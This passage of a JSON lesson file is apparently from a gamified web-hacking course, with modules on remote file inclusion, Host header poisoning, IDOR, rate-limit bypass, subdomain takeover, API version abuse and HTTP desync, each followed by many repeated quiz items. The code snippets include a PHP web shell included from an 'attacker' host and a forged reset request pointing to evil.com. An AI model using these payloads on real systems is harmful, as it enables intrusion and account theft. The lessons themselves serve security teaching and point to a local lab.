WAFs"],"ans":1},{"type":"quiz","q":"Parameterized queries prevent...","opts":["XSS","SQL injection","CSRF","Clickjacking"],"ans":1},{"type":"quiz","q":"What does robots.txt reveal?","opts":["Passwords","Directories the site wants hidden from crawlers","Vulnerabilities","API keys"],"ans":1},{"type":"quiz","q":"HTTPS encrypts traffic using...","opts":["SSH","TLS/SSL","IPSec","WPA"],"ans":1},{"type":"quiz","q":"SQL injection targets...","opts":["The web server OS","Database queries","JavaScript engine","CSS rendering"],"ans":1},{"type":"quiz","q":"XSS allows an attacker to...","opts":["Crash the server","Execute scripts in other users' browsers","Access the database directly","Bypass the firewall"],"ans":1},{"type":"quiz","q":"CSRF tricks the victim into...","opts":["Downloading malware","Making unintended requests while authenticated","Revealing their password","Opening a malicious file"],"ans":1},{"type":"quiz","q":"What HTTP status code means 'Not Found'?","opts":["200","301","403","404"],"ans":3},{"type":"quiz","q":"Burp Suite is primarily used for...","opts":["Network scanning","Web application testing (proxy/scanner)","Password cracking","Malware analysis"],"ans":1},{"type":"quiz","q":"Content-Security-Policy header prevents...","opts":["SQL injection","Cross-site scripting (XSS)","CSRF","SSRF"],"ans":1},{"type":"quiz","q":"An HTTP 500 error indicates...","opts":["Client error","Redirect","Server-side error","Authentication required"],"ans":2},{"type":"quiz","q":"Same-Origin Policy restricts...","opts":["Server-to-server requests","Browser cross-origin JavaScript access","DNS queries","File uploads"],"ans":1},{"type":"quiz","q":"Directory traversal uses...","opts":["SQL keywords","../ sequences to access files outside web root","JavaScript injection","HTTP methods"],"ans":1},{"type":"quiz","q":"What tool intercepts HTTP requests?","opts":["nmap","Burp Suite / mitmproxy","hashcat","Metasploit"],"ans":1},{"type":"quiz","q":"A secure cookie should have which flags?","opts":["Secure, HttpOnly, SameSite","Public, Readable, Global","Debug, Verbose, Trace","None needed"],"ans":0},{"type":"quiz","q":"SQL injection targets...","opts":["The OS","Database queries","JavaScript","CSS"],"ans":1},{"type":"quiz","q":"XSS executes scripts in...","opts":["The server","Other users' browsers","The database","The firewall"],"ans":1},{"type":"quiz","q":"CSRF tricks victims into...","opts":["Downloading malware","Making unintended authenticated requests","Revealing passwords","Opening files"],"ans":1},{"type":"quiz","q":"HTTP 404 means...","opts":["OK","Redirect","Forbidden","Not Found"],"ans":3},{"type":"quiz","q":"Burp Suite is for...","opts":["Network scanning","Web application testing","Password cracking","Malware analysis"],"ans":1},{"type":"quiz","q":"CSP prevents...","opts":["SQL injection","Cross-site scripting","CSRF","SSRF"],"ans":1},{"type":"quiz","q":"HTTP 500 indicates...","opts":["Client error","Redirect","Server error","Auth required"],"ans":2},{"type":"quiz","q":"Same-Origin Policy restricts...","opts":["Server requests","Cross-origin JavaScript access","DNS queries","Uploads"],"ans":1},{"type":"quiz","q":"Directory traversal uses...","opts":["SQL","../ sequences","JavaScript","HTTP methods"],"ans":1},{"type":"quiz","q":"Parameterized queries prevent...","opts":["XSS","SQL injection","CSRF","Clickjacking"],"ans":1}]},{"id":"w-file-inclusion-remote","cat":"Web Application","title":"Remote File Inclusion (RFI)","diff":2,"xp":150,"intro":"Include and execute a file from an external server.","sections":[{"type":"text","content":"RFI loads and executes a file from a URL you control. Host a PHP shell on your server and include it through the vulnerable parameter."},{"type":"code","lang":"bash","content":"# Host malicious file\necho '<?php system($_GET[\"cmd\"]); ?>' > shell.txt\npython3 -m http.server 8000\n# Include remotely\ncurl 'http://target.com/page.php?file=http://attacker:8000/shell.txt&cmd=id'"},{"type":"text","content":"Web vulnerabilities exist because developers trust user input. Every form field, URL parameter, and header is a potential injection point. Find where user data meets processing without validation."},{"type":"tip","content":"Use the app as a regular user first. Map every feature and endpoint. The best bugs come from understanding business logic, not just throwing payloads."},{"type":"task","content":"Set up DVWA locally. For each vulnerability type, start at the lowest security level and work up. Write down WHY each defense blocks your payload."},{"type":"quiz","q":"RFI differs from LFI by...","opts":["Nothing","Loading files from an external server instead of local files","Using encryption","Requiring admin"],"ans":1},{"type":"quiz","q":"SQL injection targets...","opts":["The web server OS","Database queries","JavaScript engine","CSS rendering"],"ans":1},{"type":"quiz","q":"XSS allows an attacker to...","opts":["Crash the server","Execute scripts in other users' browsers","Access the database directly","Bypass the firewall"],"ans":1},{"type":"quiz","q":"CSRF tricks the victim into...","opts":["Downloading malware","Making unintended requests while authenticated","Revealing their password","Opening a malicious file"],"ans":1},{"type":"quiz","q":"What HTTP status code means 'Not Found'?","opts":["200","301","403","404"],"ans":3},{"type":"quiz","q":"Burp Suite is primarily used for...","opts":["Network scanning","Web application testing (proxy/scanner)","Password cracking","Malware analysis"],"ans":1},{"type":"quiz","q":"Content-Security-Policy header prevents...","opts":["SQL injection","Cross-site scripting (XSS)","CSRF","SSRF"],"ans":1},{"type":"quiz","q":"An HTTP 500 error indicates...","opts":["Client error","Redirect","Server-side error","Authentication required"],"ans":2},{"type":"quiz","q":"Same-Origin Policy restricts...","opts":["Server-to-server requests","Browser cross-origin JavaScript access","DNS queries","File uploads"],"ans":1},{"type":"quiz","q":"Directory traversal uses...","opts":["SQL keywords","../ sequences to access files outside web root","JavaScript injection","HTTP methods"],"ans":1},{"type":"quiz","q":"What tool intercepts HTTP requests?","opts":["nmap","Burp Suite / mitmproxy","hashcat","Metasploit"],"ans":1},{"type":"quiz","q":"A secure cookie should have which flags?","opts":["Secure, HttpOnly, SameSite","Public, Readable, Global","Debug, Verbose, Trace","None needed"],"ans":0},{"type":"quiz","q":"What is the default HTTP port?","opts":["443","8080","22","80"],"ans":3},{"type":"quiz","q":"Parameterized queries prevent...","opts":["XSS","SQL injection","CSRF","Clickjacking"],"ans":1},{"type":"quiz","q":"What does robots.txt reveal?","opts":["Passwords","Directories the site wants hidden from crawlers","Vulnerabilities","API keys"],"ans":1},{"type":"quiz","q":"SQL injection targets...","opts":["The OS","Database queries","JavaScript","CSS"],"ans":1},{"type":"quiz","q":"XSS executes scripts in...","opts":["The server","Other users' browsers","The database","The firewall"],"ans":1},{"type":"quiz","q":"CSRF tricks victims into...","opts":["Downloading malware","Making unintended authenticated requests","Revealing passwords","Opening files"],"ans":1},{"type":"quiz","q":"HTTP 404 means...","opts":["OK","Redirect","Forbidden","Not Found"],"ans":3},{"type":"quiz","q":"Burp Suite is for...","opts":["Network scanning","Web application testing","Password cracking","Malware analysis"],"ans":1},{"type":"quiz","q":"CSP prevents...","opts":["SQL injection","Cross-site scripting","CSRF","SSRF"],"ans":1},{"type":"quiz","q":"HTTP 500 indicates...","opts":["Client error","Redirect","Server error","Auth required"],"ans":2},{"type":"quiz","q":"Same-Origin Policy restricts...","opts":["Server requests","Cross-origin JavaScript access","DNS queries","Uploads"],"ans":1},{"type":"quiz","q":"Directory traversal uses...","opts":["SQL","../ sequences","JavaScript","HTTP methods"],"ans":1},{"type":"quiz","q":"Parameterized queries prevent...","opts":["XSS","SQL injection","CSRF","Clickjacking"],"ans":1}]},{"id":"w-host-header-poison","cat":"Web Application","title":"Host Header Poisoning","diff":3,"xp":200,"intro":"Exploit apps that trust the Host header for URL generation.","sections":[{"type":"text","content":"If the app uses the Host header to generate links (password resets, canonical URLs, redirects), inject your domain to steal tokens."},{"type":"code","lang":"bash","content":"POST /forgot-password HTTP/1.1\nHost: evil.com\nContent-Type: application/x-www-form-urlencoded\n\nemail=victim@target.com\n# The reset email contains: https://evil.com/reset?token=SECRET"},{"type":"text","content":"Web vulnerabilities exist because developers trust user input. Every form field, URL parameter, and header is a potential injection point. Find where user data meets processing without validation."},{"type":"tip","content":"Use the app as a regular user first. Map every feature and endpoint. The best bugs come from understanding business logic, not just throwing payloads."},{"type":"task","content":"Set up DVWA locally. For each vulnerability type, start at the lowest security level and work up. Write down WHY each defense blocks your payload."},{"type":"quiz","q":"Host header poisoning targets...","opts":["DNS","Applications that use the Host header to generate URLs","Network routing","Encryption"],"ans":1},{"type":"quiz","q":"HTTPS encrypts traffic using...","opts":["SSH","TLS/SSL","IPSec","WPA"],"ans":1},{"type":"quiz","q":"SQL injection targets...","opts":["The web server OS","Database queries","JavaScript engine","CSS rendering"],"ans":1},{"type":"quiz","q":"XSS allows an attacker to...","opts":["Crash the server","Execute scripts in other users' browsers","Access the database directly","Bypass the firewall"],"ans":1},{"type":"quiz","q":"CSRF tricks the victim into...","opts":["Downloading malware","Making unintended requests while authenticated","Revealing their password","Opening a malicious file"],"ans":1},{"type":"quiz","q":"What HTTP status code means 'Not Found'?","opts":["200","301","403","404"],"ans":3},{"type":"quiz","q":"Burp Suite is primarily used for...","opts":["Network scanning","Web application testing (proxy/scanner)","Password cracking","Malware analysis"],"ans":1},{"type":"quiz","q":"Content-Security-Policy header prevents...","opts":["SQL injection","Cross-site scripting (XSS)","CSRF","SSRF"],"ans":1},{"type":"quiz","q":"An HTTP 500 error indicates...","opts":["Client error","Redirect","Server-side error","Authentication required"],"ans":2},{"type":"quiz","q":"Same-Origin Policy restricts...","opts":["Server-to-server requests","Browser cross-origin JavaScript access","DNS queries","File uploads"],"ans":1},{"type":"quiz","q":"Directory traversal uses...","opts":["SQL keywords","../ sequences to access files outside web root","JavaScript injection","HTTP methods"],"ans":1},{"type":"quiz","q":"What tool intercepts HTTP requests?","opts":["nmap","Burp Suite / mitmproxy","hashcat","Metasploit"],"ans":1},{"type":"quiz","q":"A secure cookie should have which flags?","opts":["Secure, HttpOnly, SameSite","Public, Readable, Global","Debug, Verbose, Trace","None needed"],"ans":0},{"type":"quiz","q":"What is the default HTTP port?","opts":["443","8080","22","80"],"ans":3},{"type":"quiz","q":"Parameterized queries prevent...","opts":["XSS","SQL injection","CSRF","Clickjacking"],"ans":1},{"type":"quiz","q":"SQL injection targets...","opts":["The OS","Database queries","JavaScript","CSS"],"ans":1},{"type":"quiz","q":"XSS executes scripts in...","opts":["The server","Other users' browsers","The database","The firewall"],"ans":1},{"type":"quiz","q":"CSRF tricks victims into...","opts":["Downloading malware","Making unintended authenticated requests","Revealing passwords","Opening files"],"ans":1},{"type":"quiz","q":"HTTP 404 means...","opts":["OK","Redirect","Forbidden","Not Found"],"ans":3},{"type":"quiz","q":"Burp Suite is for...","opts":["Network scanning","Web application testing","Password cracking","Malware analysis"],"ans":1},{"type":"quiz","q":"CSP prevents...","opts":["SQL injection","Cross-site scripting","CSRF","SSRF"],"ans":1},{"type":"quiz","q":"HTTP 500 indicates...","opts":["Client error","Redirect","Server error","Auth required"],"ans":2},{"type":"quiz","q":"Same-Origin Policy restricts...","opts":["Server requests","Cross-origin JavaScript access","DNS queries","Uploads"],"ans":1},{"type":"quiz","q":"Directory traversal uses...","opts":["SQL","../ sequences","JavaScript","HTTP methods"],"ans":1},{"type":"quiz","q":"Parameterized queries prevent...","opts":["XSS","SQL injection","CSRF","Clickjacking"],"ans":1}]},{"id":"w-idor-uuid","cat":"Web Application","title":"IDOR with UUIDs","diff":3,"xp":200,"intro":"Exploit IDOR even when IDs are UUIDs instead of sequential numbers.","sections":[{"type":"text","content":"UUIDs aren't secret if leaked in URLs, API responses, or logs. Check for UUID disclosure in other endpoints, then use them to access other users' data."},{"type":"code","lang":"bash","content":"# UUID leaked in response:\nGET /api/me -> {\"id\":\"550e8400-e29b-41d4-a716-446655440000\"}\n# Other user's UUID from a different endpoint:\nGET /api/users -> [{\"id\":\"550e8400-...-440001\"},{\"id\":\"550e8400-...-440002\"}]\n# Access their data:\nGET /api/users/550e8400-...-440002/profile"},{"type":"text","content":"Web vulnerabilities exist because developers trust user input. Every form field, URL parameter, and header is a potential injection point. Find where user data meets processing without validation."},{"type":"tip","content":"Use the app as a regular user first. Map every feature and endpoint. The best bugs come from understanding business logic, not just throwing payloads."},{"type":"task","content":"Set up DVWA locally. For each vulnerability type, start at the lowest security level and work up. Write down WHY each defense blocks your payload."},{"type":"quiz","q":"UUIDs prevent IDOR only if...","opts":["They're long enough","They're never disclosed to the user","They're encrypted","They're sequential"],"ans":1},{"type":"quiz","q":"What does robots.txt reveal?","opts":["Passwords","Directories the site wants hidden from crawlers","Vulnerabilities","API keys"],"ans":1},{"type":"quiz","q":"HTTPS encrypts traffic using...","opts":["SSH","TLS/SSL","IPSec","WPA"],"ans":1},{"type":"quiz","q":"SQL injection targets...","opts":["The web server OS","Database queries","JavaScript engine","CSS rendering"],"ans":1},{"type":"quiz","q":"XSS allows an attacker to...","opts":["Crash the server","Execute scripts in other users' browsers","Access the database directly","Bypass the firewall"],"ans":1},{"type":"quiz","q":"CSRF tricks the victim into...","opts":["Downloading malware","Making unintended requests while authenticated","Revealing their password","Opening a malicious file"],"ans":1},{"type":"quiz","q":"What HTTP status code means 'Not Found'?","opts":["200","301","403","404"],"ans":3},{"type":"quiz","q":"Burp Suite is primarily used for...","opts":["Network scanning","Web application testing (proxy/scanner)","Password cracking","Malware analysis"],"ans":1},{"type":"quiz","q":"Content-Security-Policy header prevents...","opts":["SQL injection","Cross-site scripting (XSS)","CSRF","SSRF"],"ans":1},{"type":"quiz","q":"An HTTP 500 error indicates...","opts":["Client error","Redirect","Server-side error","Authentication required"],"ans":2},{"type":"quiz","q":"Same-Origin Policy restricts...","opts":["Server-to-server requests","Browser cross-origin JavaScript access","DNS queries","File uploads"],"ans":1},{"type":"quiz","q":"Directory traversal uses...","opts":["SQL keywords","../ sequences to access files outside web root","JavaScript injection","HTTP methods"],"ans":1},{"type":"quiz","q":"What tool intercepts HTTP requests?","opts":["nmap","Burp Suite / mitmproxy","hashcat","Metasploit"],"ans":1},{"type":"quiz","q":"A secure cookie should have which flags?","opts":["Secure, HttpOnly, SameSite","Public, Readable, Global","Debug, Verbose, Trace","None needed"],"ans":0},{"type":"quiz","q":"What is the default HTTP port?","opts":["443","8080","22","80"],"ans":3},{"type":"quiz","q":"SQL injection targets...","opts":["The OS","Database queries","JavaScript","CSS"],"ans":1},{"type":"quiz","q":"XSS executes scripts in...","opts":["The server","Other users' browsers","The database","The firewall"],"ans":1},{"type":"quiz","q":"CSRF tricks victims into...","opts":["Downloading malware","Making unintended authenticated requests","Revealing passwords","Opening files"],"ans":1},{"type":"quiz","q":"HTTP 404 means...","opts":["OK","Redirect","Forbidden","Not Found"],"ans":3},{"type":"quiz","q":"Burp Suite is for...","opts":["Network scanning","Web application testing","Password cracking","Malware analysis"],"ans":1},{"type":"quiz","q":"CSP prevents...","opts":["SQL injection","Cross-site scripting","CSRF","SSRF"],"ans":1},{"type":"quiz","q":"HTTP 500 indicates...","opts":["Client error","Redirect","Server error","Auth required"],"ans":2},{"type":"quiz","q":"Same-Origin Policy restricts...","opts":["Server requests","Cross-origin JavaScript access","DNS queries","Uploads"],"ans":1},{"type":"quiz","q":"Directory traversal uses...","opts":["SQL","../ sequences","JavaScript","HTTP methods"],"ans":1},{"type":"quiz","q":"Parameterized queries prevent...","opts":["XSS","SQL injection","CSRF","Clickjacking"],"ans":1}]},{"id":"w-rate-limit-bypass2","cat":"Web Application","title":"Advanced Rate Limit Bypass","diff":3,"xp":200,"intro":"Bypass rate limiting with header manipulation and request variation.","sections":[{"type":"text","content":"Rate limits often key on IP, user agent, or specific parameters. Bypass by rotating these values or finding un-limited endpoints."},{"type":"code","lang":"bash","content":"# IP rotation via headers\ncurl -H 'X-Forwarded-For: 10.0.0.1' target.com/login\ncurl -H 'X-Real-IP: 10.0.0.2' target.com/login\n# Case variation: /Login vs /login vs /LOGIN\n# Parameter variation: email vs Email vs EMAIL\n# Different endpoint: /api/v1/login vs /api/v2/login"},{"type":"text","content":"Web vulnerabilities exist because developers trust user input. Every form field, URL parameter, and header is a potential injection point. Find where user data meets processing without validation."},{"type":"tip","content":"Use the app as a regular user first. Map every feature and endpoint. The best bugs come from understanding business logic, not just throwing payloads."},{"type":"task","content":"Set up DVWA locally. For each vulnerability type, start at the lowest security level and work up. Write down WHY each defense blocks your payload."},{"type":"quiz","q":"X-Forwarded-For bypasses rate limits when...","opts":["The server ignores it","The server trusts it as the client's real IP","It's encrypted","It changes the response"],"ans":1},{"type":"quiz","q":"SQL injection targets...","opts":["The web server OS","Database queries","JavaScript engine","CSS rendering"],"ans":1},{"type":"quiz","q":"XSS allows an attacker to...","opts":["Crash the server","Execute scripts in other users' browsers","Access the database directly","Bypass the firewall"],"ans":1},{"type":"quiz","q":"CSRF tricks the victim into...","opts":["Downloading malware","Making unintended requests while authenticated","Revealing their password","Opening a malicious file"],"ans":1},{"type":"quiz","q":"What HTTP status code means 'Not Found'?","opts":["200","301","403","404"],"ans":3},{"type":"quiz","q":"Burp Suite is primarily used for...","opts":["Network scanning","Web application testing (proxy/scanner)","Password cracking","Malware analysis"],"ans":1},{"type":"quiz","q":"Content-Security-Policy header prevents...","opts":["SQL injection","Cross-site scripting (XSS)","CSRF","SSRF"],"ans":1},{"type":"quiz","q":"An HTTP 500 error indicates...","opts":["Client error","Redirect","Server-side error","Authentication required"],"ans":2},{"type":"quiz","q":"Same-Origin Policy restricts...","opts":["Server-to-server requests","Browser cross-origin JavaScript access","DNS queries","File uploads"],"ans":1},{"type":"quiz","q":"Directory traversal uses...","opts":["SQL keywords","../ sequences to access files outside web root","JavaScript injection","HTTP methods"],"ans":1},{"type":"quiz","q":"What tool intercepts HTTP requests?","opts":["nmap","Burp Suite / mitmproxy","hashcat","Metasploit"],"ans":1},{"type":"quiz","q":"A secure cookie should have which flags?","opts":["Secure, HttpOnly, SameSite","Public, Readable, Global","Debug, Verbose, Trace","None needed"],"ans":0},{"type":"quiz","q":"What is the default HTTP port?","opts":["443","8080","22","80"],"ans":3},{"type":"quiz","q":"Parameterized queries prevent...","opts":["XSS","SQL injection","CSRF","Clickjacking"],"ans":1},{"type":"quiz","q":"What does robots.txt reveal?","opts":["Passwords","Directories the site wants hidden from crawlers","Vulnerabilities","API keys"],"ans":1},{"type":"quiz","q":"SQL injection targets...","opts":["The OS","Database queries","JavaScript","CSS"],"ans":1},{"type":"quiz","q":"XSS executes scripts in...","opts":["The server","Other users' browsers","The database","The firewall"],"ans":1},{"type":"quiz","q":"CSRF tricks victims into...","opts":["Downloading malware","Making unintended authenticated requests","Revealing passwords","Opening files"],"ans":1},{"type":"quiz","q":"HTTP 404 means...","opts":["OK","Redirect","Forbidden","Not Found"],"ans":3},{"type":"quiz","q":"Burp Suite is for...","opts":["Network scanning","Web application testing","Password cracking","Malware analysis"],"ans":1},{"type":"quiz","q":"CSP prevents...","opts":["SQL injection","Cross-site scripting","CSRF","SSRF"],"ans":1},{"type":"quiz","q":"HTTP 500 indicates...","opts":["Client error","Redirect","Server error","Auth required"],"ans":2},{"type":"quiz","q":"Same-Origin Policy restricts...","opts":["Server requests","Cross-origin JavaScript access","DNS queries","Uploads"],"ans":1},{"type":"quiz","q":"Directory traversal uses...","opts":["SQL","../ sequences","JavaScript","HTTP methods"],"ans":1},{"type":"quiz","q":"Parameterized queries prevent...","opts":["XSS","SQL injection","CSRF","Clickjacking"],"ans":1}]},{"id":"w-subdomain-takeover2","cat":"Web Application","title":"Subdomain Takeover Exploitation","diff":3,"xp":200,"intro":"Claim an unclaimed cloud service pointed to by a CNAME.","sections":[{"type":"text","content":"When old.target.com CNAME -> something.herokuapp.com and the Heroku app is deleted, create a new app claiming that domain."},{"type":"code","lang":"bash","content":"# Detect vulnerable CNAMEs\ndig old.target.com CNAME +short\ncurl old.target.com  # 'No such app' = vulnerable\n# Claim on Heroku:\nheroku create --stack=heroku-20\nheroku domains:add old.target.com"},{"type":"text","content":"Web vulnerabilities exist because developers trust user input. Every form field, URL parameter, and header is a potential injection point. Find where user data meets processing without validation."},{"type":"tip","content":"Use the app as a regular user first. Map every feature and endpoint. The best bugs come from understanding business logic, not just throwing payloads."},{"type":"task","content":"Set up DVWA locally. For each vulnerability type, start at the lowest security level and work up. Write down WHY each defense blocks your payload."},{"type":"quiz","q":"Subdomain takeover leads to...","opts":["DNS hijacking","Serving attacker content under the trusted domain (cookie theft, phishing)","Database access","Network scanning"],"ans":1},{"type":"quiz","q":"HTTPS encrypts traffic using...","opts":["SSH","TLS/SSL","IPSec","WPA"],"ans":1},{"type":"quiz","q":"SQL injection targets...","opts":["The web server OS","Database queries","JavaScript engine","CSS rendering"],"ans":1},{"type":"quiz","q":"XSS allows an attacker to...","opts":["Crash the server","Execute scripts in other users' browsers","Access the database directly","Bypass the firewall"],"ans":1},{"type":"quiz","q":"CSRF tricks the victim into...","opts":["Downloading malware","Making unintended requests while authenticated","Revealing their password","Opening a malicious file"],"ans":1},{"type":"quiz","q":"What HTTP status code means 'Not Found'?","opts":["200","301","403","404"],"ans":3},{"type":"quiz","q":"Burp Suite is primarily used for...","opts":["Network scanning","Web application testing (proxy/scanner)","Password cracking","Malware analysis"],"ans":1},{"type":"quiz","q":"Content-Security-Policy header prevents...","opts":["SQL injection","Cross-site scripting (XSS)","CSRF","SSRF"],"ans":1},{"type":"quiz","q":"An HTTP 500 error indicates...","opts":["Client error","Redirect","Server-side error","Authentication required"],"ans":2},{"type":"quiz","q":"Same-Origin Policy restricts...","opts":["Server-to-server requests","Browser cross-origin JavaScript access","DNS queries","File uploads"],"ans":1},{"type":"quiz","q":"Directory traversal uses...","opts":["SQL keywords","../ sequences to access files outside web root","JavaScript injection","HTTP methods"],"ans":1},{"type":"quiz","q":"What tool intercepts HTTP requests?","opts":["nmap","Burp Suite / mitmproxy","hashcat","Metasploit"],"ans":1},{"type":"quiz","q":"A secure cookie should have which flags?","opts":["Secure, HttpOnly, SameSite","Public, Readable, Global","Debug, Verbose, Trace","None needed"],"ans":0},{"type":"quiz","q":"What is the default HTTP port?","opts":["443","8080","22","80"],"ans":3},{"type":"quiz","q":"Parameterized queries prevent...","opts":["XSS","SQL injection","CSRF","Clickjacking"],"ans":1},{"type":"quiz","q":"SQL injection targets...","opts":["The OS","Database queries","JavaScript","CSS"],"ans":1},{"type":"quiz","q":"XSS executes scripts in...","opts":["The server","Other users' browsers","The database","The firewall"],"ans":1},{"type":"quiz","q":"CSRF tricks victims into...","opts":["Downloading malware","Making unintended authenticated requests","Revealing passwords","Opening files"],"ans":1},{"type":"quiz","q":"HTTP 404 means...","opts":["OK","Redirect","Forbidden","Not Found"],"ans":3},{"type":"quiz","q":"Burp Suite is for...","opts":["Network scanning","Web application testing","Password cracking","Malware analysis"],"ans":1},{"type":"quiz","q":"CSP prevents...","opts":["SQL injection","Cross-site scripting","CSRF","SSRF"],"ans":1},{"type":"quiz","q":"HTTP 500 indicates...","opts":["Client error","Redirect","Server error","Auth required"],"ans":2},{"type":"quiz","q":"Same-Origin Policy restricts...","opts":["Server requests","Cross-origin JavaScript access","DNS queries","Uploads"],"ans":1},{"type":"quiz","q":"Directory traversal uses...","opts":["SQL","../ sequences","JavaScript","HTTP methods"],"ans":1},{"type":"quiz","q":"Parameterized queries prevent...","opts":["XSS","SQL injection","CSRF","Clickjacking"],"ans":1}]},{"id":"w-api-versioning-abuse","cat":"Web Application","title":"API Version Abuse","diff":2,"xp":150,"intro":"Test older API versions that may lack security fixes.","sections":[{"type":"text","content":"When /api/v2/ has rate limiting and auth checks, /api/v1/ may still be active without them. Test every version you can find."},{"type":"code","lang":"bash","content":"# Try older versions\ncurl https://api.target.com/v1/users  # may bypass auth\ncurl https://api.target.com/v0/admin  # may exist\ncurl https://api.target.com/beta/users  # development version"},{"type":"text","content":"Web vulnerabilities exist because developers trust user input. Every form field, URL parameter, and header is a potential injection point. Find where user data meets processing without validation."},{"type":"tip","content":"Use the app as a regular user first. Map every feature and endpoint. The best bugs come from understanding business logic, not just throwing payloads."},{"type":"task","content":"Set up DVWA locally. For each vulnerability type, start at the lowest security level and work up. Write down WHY each defense blocks your payload."},{"type":"quiz","q":"Older API versions are risky because...","opts":["They're faster","They may lack security controls added in newer versions","They're encrypted","They use different protocols"],"ans":1},{"type":"quiz","q":"SQL injection targets...","opts":["The web server OS","Database queries","JavaScript engine","CSS rendering"],"ans":1},{"type":"quiz","q":"XSS allows an attacker to...","opts":["Crash the server","Execute scripts in other users' browsers","Access the database directly","Bypass the firewall"],"ans":1},{"type":"quiz","q":"CSRF tricks the victim into...","opts":["Downloading malware","Making unintended requests while authenticated","Revealing their password","Opening a malicious file"],"ans":1},{"type":"quiz","q":"What HTTP status code means 'Not Found'?","opts":["200","301","403","404"],"ans":3},{"type":"quiz","q":"Burp Suite is primarily used for...","opts":["Network scanning","Web application testing (proxy/scanner)","Password cracking","Malware analysis"],"ans":1},{"type":"quiz","q":"Content-Security-Policy header prevents...","opts":["SQL injection","Cross-site scripting (XSS)","CSRF","SSRF"],"ans":1},{"type":"quiz","q":"An HTTP 500 error indicates...","opts":["Client error","Redirect","Server-side error","Authentication required"],"ans":2},{"type":"quiz","q":"Same-Origin Policy restricts...","opts":["Server-to-server requests","Browser cross-origin JavaScript access","DNS queries","File uploads"],"ans":1},{"type":"quiz","q":"Directory traversal uses...","opts":["SQL keywords","../ sequences to access files outside web root","JavaScript injection","HTTP methods"],"ans":1},{"type":"quiz","q":"What tool intercepts HTTP requests?","opts":["nmap","Burp Suite / mitmproxy","hashcat","Metasploit"],"ans":1},{"type":"quiz","q":"A secure cookie should have which flags?","opts":["Secure, HttpOnly, SameSite","Public, Readable, Global","Debug, Verbose, Trace","None needed"],"ans":0},{"type":"quiz","q":"What is the default HTTP port?","opts":["443","8080","22","80"],"ans":3},{"type":"quiz","q":"Parameterized queries prevent...","opts":["XSS","SQL injection","CSRF","Clickjacking"],"ans":1},{"type":"quiz","q":"What does robots.txt reveal?","opts":["Passwords","Directories the site wants hidden from crawlers","Vulnerabilities","API keys"],"ans":1},{"type":"quiz","q":"SQL injection targets...","opts":["The OS","Database queries","JavaScript","CSS"],"ans":1},{"type":"quiz","q":"XSS executes scripts in...","opts":["The server","Other users' browsers","The database","The firewall"],"ans":1},{"type":"quiz","q":"CSRF tricks victims into...","opts":["Downloading malware","Making unintended authenticated requests","Revealing passwords","Opening files"],"ans":1},{"type":"quiz","q":"HTTP 404 means...","opts":["OK","Redirect","Forbidden","Not Found"],"ans":3},{"type":"quiz","q":"Burp Suite is for...","opts":["Network scanning","Web application testing","Password cracking","Malware analysis"],"ans":1},{"type":"quiz","q":"CSP prevents...","opts":["SQL injection","Cross-site scripting","CSRF","SSRF"],"ans":1},{"type":"quiz","q":"HTTP 500 indicates...","opts":["Client error","Redirect","Server error","Auth required"],"ans":2},{"type":"quiz","q":"Same-Origin Policy restricts...","opts":["Server requests","Cross-origin JavaScript access","DNS queries","Uploads"],"ans":1},{"type":"quiz","q":"Directory traversal uses...","opts":["SQL","../ sequences","JavaScript","HTTP methods"],"ans":1},{"type":"quiz","q":"Parameterized queries prevent...","opts":["XSS","SQL injection","CSRF","Clickjacking"],"ans":1}]},{"id":"w-http-desync","cat":"Web Application","title":"HTTP Desynchronization Attacks","diff":5,"xp":300,"intro":"Exploit protocol-level parsing differences for request smuggling.","sections":[{"type":"text","content":"H2.CL and H2.TE desync attacks exploit differences between HTTP/2 front-end and HTTP/1.1 back-end request parsing, enabling cache poisoning and auth bypass."},{"type":"code","lang":"bash","content":"# H2.CL desync: HTTP/2 with mismatched Content-Length\n# The front-end (H2) sees one request\n# The back-end (H1) sees the CL-delimited request + leftover = smuggled request\n# Testing:\npython3 h2csmuggler.py -x https://target.com --test\n# Or Burp Suite HTTP Request Smuggler extension"},{"type":"text","content":"Web vulnerabilities exist because developers trust user input. Every form field, URL parameter, and header is a potential injection point. Find where user data meets processing without validation."},{"type":"tip","content":"Use the app as a regular user first. Map every feature and endpoint. The best bugs come from understanding business logic, not just throwing payloads."},{"type":"task","content":"Set up DVWA locally. For each vulnerability type, start at the lowest security level and work up. Write down WHY each defense blocks your payload."},{"type":"quiz","q":"HTTP desync exploits...","opts":["Weak passwords","Protocol parsing differences between proxies and servers","DNS resolution","SSL certificates"],"ans":1},{"type":"quiz","q":"SQL injection targets...","opts":["The web server OS","Database queries","JavaScript engine","CSS rendering"],"ans":1},{"type":"quiz","q":"XSS allows an attacker to...","opts":["Crash the server","Execute scripts in other users' browsers","Access the database directly","Bypass the firewall"],"ans":1},{"type":"quiz","q":"CSRF tricks the victim into...","opts":["Downloading malware","Making unintended requests while authenticated","Revealing their password","Opening a malicious file"],"ans":1},{"type":"quiz","q":"What HTTP status code means 'Not Found'?","opts":["200","301","403","404"],"ans":3},{"type":"quiz","q":"Burp Suite is primarily used for...","opts":["Network scanning","Web application testing (proxy/scanner)","Password cracking","Malware analysis"],"ans":1},{"type":"quiz","q":"Content-Security-Policy header prevents...","opts":["SQL injection","Cross-site scripting (XSS)","CSRF","SSRF"],"ans":1},{"type":"quiz","q":"An HTTP 500 error indicates...","opts":["Client error","Redirect","Server-side error","Authentication required"],"ans":2},{"type":"quiz","q":"Same-Origin Policy restricts...","opts":["Server-to-server requests","Browser cross-origin JavaScript access","DNS queries","File uploads"],"ans":1},{"type":"quiz","q":"Directory traversal uses...","opts":["SQL keywords","../ sequences to access files outside web root","JavaScript injection","HTTP methods"],"ans":1},{"type":"quiz","q":"What tool intercepts HTTP requests?","opts":["nmap","Burp Suite / mitmproxy","hashcat","Metasploit"],"ans":1},{"type":"quiz","q":"A secure cookie should have which flags?","opts":["Secure, HttpOnly, SameSite","Public, Readable, Global","Debug, Verbose, Trace","None needed"],"ans":0},{"type":"quiz","q":"What is the default HTTP port?","opts":["443","8080","22","80"],"ans":3},{"type":"quiz","q":"Parameterized queries prevent...","opts":["XSS","SQL injection","CSRF","Clickjacking"],"ans":1},{"type":"quiz","q":"What does robots.txt reveal?","opts":["Passwords","Directories the site wants hidden from crawlers","Vulnerabilities","API keys"],"ans":1},{"type":"quiz","q":"SQL injection targets...","opts":["The OS","Database queries","JavaScript","CSS"],"ans":1},{"type":"quiz","q":"XSS executes scripts in...","opts":["The server","Other users' browsers","The database","The firewall"],"ans":1},{"type":"quiz","q":"CSRF tricks victims into...","opts":["Downloading malware","Making unintended authenticated 